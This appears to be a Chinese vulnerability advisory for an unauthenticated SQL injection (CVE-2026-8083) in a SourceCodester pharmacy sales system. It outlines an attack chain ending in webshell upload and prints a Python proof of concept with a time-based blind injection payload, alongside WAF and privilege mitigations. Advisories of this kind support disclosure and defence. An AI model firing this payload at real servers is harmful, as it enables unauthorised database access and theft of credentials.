CVE-2026-8083：SourceCodester药房系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-8083

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pharmacy Sales and Inventory System

漏洞概述

SourceCodester Pharmacy Sales and Inventory System 1.0版本被发现存在严重的SQL注入安全漏洞。该漏洞源于/ajax.php?action=save_user接口未能正确处理用户提交的ID参数。攻击者无需身份认证即可利用此漏洞，远程构造恶意SQL语句并执行。成功利用该漏洞可能导致敏感数据库信息泄露，甚至影响数据的完整性和系统的可用性。

技术细节

该漏洞属于典型的SQL注入漏洞，发生在SourceCodester Pharmacy Sales and Inventory System的用户管理模块中。具体漏洞点位于/ajax.php?action=save_user文件。当系统处理保存用户信息的请求时，未对传入的“ID”参数进行严格的类型检查或有效的SQL过滤，导致攻击者可以将恶意的SQL代码注入到后端数据库查询语句中。由于CVSS向量显示PR:N（无需认证），这表明该接口可能存在未授权访问风险。攻击者可以通过发送特制的HTTP请求，利用UNION SELECT等SQL语法窃取数据库结构、获取管理员账号密码，进而控制整个系统。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标正在运行SourceCodester Pharmacy Sales and Inventory System 1.0版本，并定位到/ajax.php接口。

STEP 2

2. 漏洞探测

攻击者向/ajax.php?action=save_user发送特制的数据包，在ID参数中注入SQL语句（如单引号或延时语句），测试后端是否存在解析错误或延时响应。

STEP 3

3. 恶意利用

确认漏洞存在后，攻击者构造UNION SELECT查询或布尔盲注语句，提取数据库中的用户名、密码哈希等敏感信息。

STEP 4

4. 权限维持与扩展

利用获取的管理员凭证登录后台，进一步上传Webshell或篡改数据，完全控制受害系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(url):
    # Target endpoint
    target = f"{url}/ajax.php"
    
    # Malicious payload targeting the 'ID' parameter
    # This payload attempts a time-based blind SQL injection
    payload_data = {
        "action": "save_user",
        "ID": "1' AND SLEEP(5)-- -"
    }
    
    try:
        response = requests.post(target, data=payload_data, timeout=10)
        # Check if response time indicates successful execution
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability Confirmed: SQL Injection exists in ID parameter.")
        else:
            print("[-] Target does not appear to be vulnerable.")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    target_url = "http://example.com" # Replace with actual target
    check_sqli(target_url)

影响范围

SourceCodester Pharmacy Sales and Inventory System 1.0

防御指南

临时缓解措施

在官方补丁发布前，建议通过Web应用防火墙（WAF）拦截针对/ajax.php的异常请求，特别是包含SQL关键词（如UNION, SELECT, SLEEP）的流量。同时，检查并限制数据库用户的权限，避免使用root等高权限账户连接应用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8083
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8083
3 Details https://www.cvedetails.com/cve/CVE-2026-8083/
4 VulDB https://vuldb.com/cve/CVE-2026-8083
5 Link https://github.com/zhi-cyber/cve-2/issues/1
6 Link https://vuldb.com/submit/807848
7 Link https://vuldb.com/vuln/361837
8 Link https://vuldb.com/vuln/361837/cti
9 Link https://www.sourcecodester.com/